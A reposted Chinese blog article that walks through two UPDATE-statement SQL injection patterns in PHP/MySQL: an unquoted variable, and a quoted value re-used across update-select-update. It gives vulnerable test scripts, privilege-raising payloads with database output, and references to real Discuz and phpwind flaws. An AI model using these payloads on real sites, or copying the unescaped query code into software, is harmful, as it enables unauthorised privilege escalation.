sql+php修改mysql结构,UPDATE注射(mysql+php)的两个模式(转)

本文详细介绍了在Windows环境下,通过PHP操作MySQL数据库的两种更新注入模式,分别是变量未加引号(MOD1)和变量加引号(MOD2)的情况。作者通过实例展示了如何利用这些模式在Discuz和phpwind等软件中进行远程exploit。最后,文章感谢了多位朋友的讨论和帮助。
摘要由CSDN通过智能技术生成

UPDATE注射(mysql+php)的两个模式(转)[@more@]

一.测试环境:

OS: Windowsxp sp2

php: php 4.3.10 (

mysql 4.1.9

apache 1.3.33

二.测试数据库结构:

----start---

-- 数据库: `test`

--

-- --------------------------------------------------------

--

-- 表的结构 `userinfo`

--

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--

-- 导出表中的数据 `userinfo`

--

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.测试模式:

1,变量没有带’’或""[MOD1]

//test1.php Mod1

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

到修改groupid的目的:

那么我们提交:

在mysql里查询: mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

2,变量带’’或""[MOD2]

?php

//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

’,groudid=’1 在gpc=on的情况下’变成了’

提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查询:mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user | pass        |

+---------+-------+--------------------+

| 2    | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)

groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result);  //$p的数据写入数据库

$sql= "select pass from userinfo where user=’heige’";

$result = mysql_db_query($dbname, $sql);

$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:’,groudid=’1

回mysql查询下 : mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update--&gtselect--&gtupdate

四.实际模式

模式1:Discuz 2.0/2.2 register.php 注射

漏洞分析:

Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

模式2:phpwind 2.0.2和3.31e 权限提升漏洞    漏洞分析:

update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)

|

v

select (jop.php)

|

v

updtate (jop.php)

Exploit:

五.鸣谢

特别感谢saiy等朋友的讨论和帮助。Thanks!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值